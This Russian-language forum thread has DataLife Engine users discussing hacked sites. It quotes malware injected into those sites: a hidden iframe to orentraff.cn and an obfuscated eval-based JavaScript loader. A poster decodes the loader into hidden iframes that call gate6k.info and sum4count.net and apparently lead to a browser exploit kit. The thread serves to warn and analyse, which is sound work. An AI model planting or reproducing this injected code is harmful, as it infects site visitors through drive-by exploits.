Перейти к публикации

Рекомендованные сообщения

Здравствуйте, с первого числа взламывают мой сайт, а именно везде суют код

<iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe>

Обновил движок, защиту входа в админку на максимум поставил.... всё равно ломают. Взломали фтп похоже... полностью все пароли сменил доступ к фтп по ип сделал всё равно ломают.... редактируют в основном

\upload\engine\ajax\dle_ajax.js

\upload\engine\ajax\menu.js

шаблон\main.tpl

\upload\engine\data\config.php

и как то 'Рекламные материалы' которые в админке.... но я теперь один админ (всех убрал) не знаю даже как редактируют.... может подскажите? :(

ещё нашел

http://rapidshare.com/files/134584506/_index.php

что это?

спасибо...

сайт не дам - заражу ещё.... каспер орет........

Ссылка на сообщение
Поделиться на других сайтах

BnP

- Обнови антивирусную базу своего антивируса.

- Затем сделай глобальную проверку всего компа на вирусы... наверняка найтется какой-нить паразит...

- После поменяй пароли и логин на ФТП.

- отпиши хостеру на предмет логов... откуда были произведены изменения файлов - с ФТП или с хоста... хотя от них правды порой не дождаться... у них всегда все в ажуре...

Изменено пользователем kosen
Ссылка на сообщение
Поделиться на других сайтах

Здравствуйте, с первого числа взламывают мой сайт, а именно везде суют код

<iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe>

Обновил движок, защиту входа в админку на максимум поставил.... всё равно ломают. Взломали фтп похоже... полностью все пароли сменил доступ к фтп по ип сделал всё равно ломают.... редактируют в основном

\upload\engine\ajax\dle_ajax.js

\upload\engine\ajax\menu.js

шаблон\main.tpl

\upload\engine\data\config.php

и как то 'Рекламные материалы' которые в админке.... но я теперь один админ (всех убрал) не знаю даже как редактируют.... может подскажите? :(

ещё нашел

http://rapidshare.com/files/134584506/_index.php

что это?

спасибо...

сайт не дам - заражу ещё.... каспер орет........

в этом файлике у тебя троянчег сидит

Ссылка на сообщение
Поделиться на других сайтах

Взлом dle-news.ru. Подробности.

http://www.nulled.ws/showthread.php?t=71436

Сорри за такую кричащую тему, да еще в такой поздний час (02.40 местного)? но если это не подмена содержимого, не правка DNS в серваке.... то... )))

Случайно решил зайти на офф.сайт и при загрузки сработал антизверь. Антизверь параноик, и увидив знакомое сочетание в домене google, я разрешил ему выполнить скрипт.

Совственно сижу под оперой и ничего страшного не произошло.

пока писал, решил еще раз глянуть, скрипт отработал по новой (куки потер, ИП сменил для верности) и выкинул новый фрейм, скриншот с воплями авиры смотреть здесь http://imageshost.ru/links/c95a15ef6...d96b5f4035e5ca

Озадачало только появление рекламы с гугля на сайте целсофта, который поидее еще до 6 в отпуске.

Открываю исходник главной страницы? гуглом и не пахнет, а вижу ЛЕВЫЙ код, сначало не поверил.

<body><script language=JavaScript>	function mdnbn15(p) {	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0,0,0,24,11,60,12,44,43,5,3,15,59,36,30,5

5,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,0,0,0,41,0,48,16,20,21,28,22,2,42,54,18

,

23,17,25,62,9,37,34,61,56,47,40,35,57,39,32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN

4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KI

z

AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7Mus

W

nI')	</script><!-- dle-news.ru -->

<script language="javascript" type="text/javascript">

<!--

var dle_root	   = '/';
после расшифровки получаем
window.status='Done';document.write('<iframe name=47210 src="http://gate6k.info/t/?'+Math.round(Math.random()*16909)+'47210'+'" width=457 height=37 style="display:none"></iframe>')
т.е. открывается фрейм по адресу http://gate6k.info/t/?_РНД_47210 причем открывается один раз - фильт по кукам + ip, если один раз у вас страница подгружалась - то выдается 404. смотрим
<iframe name=1c53b80a90 src='http://sum4count.net/strong/188/?cd6f51' width=399 height=60 style='display:none;'></iframe>
грузим, смотрим
<html>

<body>

<script>

document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%65%32%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%6D%70%39%2E%68%74%6D%6C%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%3E%3C%2F%69%66%72%61%6D%65%3E"));

</script>

</body>

</html>
дешифруем
<iframe src="e2.html" width="1" height="1"></iframe>

<iframe src="mp9.html" width="1" height="1"></iframe>

короче мне надоело, это явно одна из последних сязок сплоитов под распространенные браузеры.

как я понял выдают страницы RNВ со сплоитами, и если вы опять на них были - идет переадресация, в моем случае при первых попытках "пройтись до конца" была на msn.com

под оперой 9.52 ничего не пристает. у кого ишак - даже не думайте, FF... хз.

ИТОГО.

КАК и через что внесли коррективы в сайт целсофта я НЕ знаю.

либо хостер, либо шаблон через админку, либо пароль через троян на фтп... всяко может быть.

зыы. проверил через разные php анамайзеры, код висит, значит точно не dns

Добавлено через 6 минут

ВНИМАНИЕ.

ТАК ЖЕ ЗАРАЖЕННЫМ оказался Украинский сайт DLE

вредоносный код прописан в файле

http://www.nulled.ws/redirector.php?url=ht...Fjs%2Fstyles.js

ну и естественно demo.dle-news.ru

по остальным раскрученным врое тихо

Изменено пользователем Greeze
Ссылка на сообщение
Поделиться на других сайтах
ну и естественно demo.dle-news.ru
Касперский молчит, хотя в коде видно явно посторонне явления в виде
<script language=JavaScript>	function mdnbn15(p) {	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0
,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0,
0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39,
32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN
4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KIz
AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7MusW
nI') </script><!-- dle-news.ru -->
[/codebox]

Ссылка на сообщение
Поделиться на других сайтах

Вообще штука распространённая, много народу на неё попадало на самых различных сайтах и движках.

Я не думаю, что дело в движке. В прочем, целсофт вернётся и всё проверит по логам...

Ссылка на сообщение
Поделиться на других сайтах

ну и естественно demo.dle-news.ru
Касперский молчит, хотя в коде видно явно посторонне явления в виде
<script language=JavaScript>	function mdnbn15(p) {	var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,53,1,49,52,51,14,46,10,27,0,0,0,0
,0,0,24,11,60,12,44,43,5,3,15,59,36,30,55,58,45,29,8,38,6,26,13,19,4,7,31,0,50,0
,
0,0,0,41,0,48,16,20,21,28,22,2,42,54,18,23,17,25,62,9,37,34,61,56,47,40,35,57,39
,
32,33);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(198^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}mdnbn15('3n8hqQSDukEDx8ID17XsgQ8hvRK0qQS_57Muu8AM3jIEZ6hIzE0EyjI_E6hwuKMhv7tB3U0ri9KN
4fMnJIhDZSA0_xKux8IuaL8Mtq8u_Q7D_xXsNts_ZM8M4QMDu8hIAKhD7q6Nxqhu_7hIt5nra0tr00KI
z
AXB4XtrzLKsJ9KDt8hD77tB5Wtw76MEzMhDIkXBQkED0hMuIU7utfENhKMtBvShu68wsEXMtg8Nx7Mus
W
nI') </script><!-- dle-news.ru -->
[/codebox]

Этот же код и на http://dle-news.ru/

Ссылка на сообщение
Поделиться на других сайтах

вредоносный код прописан в файле

http://www.nulled.ws/redirector.php?url=ht...Fjs%2Fstyles.js

Там совсем другой код. Посмотрел, имхо, не заражен.

Ссылка на сообщение
Поделиться на других сайтах

сегодня при заходе на сайт каспер орал - трояна находил в файлах кэша оперы (какой то пдфник был заражен).. я как раз собирался покупать этот скрипт, и вот теперь незнаю... ждем появления админа

Ссылка на сообщение
Поделиться на других сайтах

да, да. украинский чистый, просто авира параноик, там просто скрытая подгрузка стилей css - защита от рипа

Ссылка на сообщение
Поделиться на других сайтах

e-al, а не ты ли провокатор? ;)

там просто скрытая подгрузка стилей css - защита от рипа
бесполезная защита
Ссылка на сообщение
Поделиться на других сайтах

там просто скрытая подгрузка стилей css - защита от рипа

ух ты ) как такое реализовать?

http://4dle.ru/bugs/1147156035-nedostatoch...filtracija.html

Ссылка на сообщение
Поделиться на других сайтах
проще не тысячу проверок лепить, а одним регулярным выражением расставить все точки над i
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...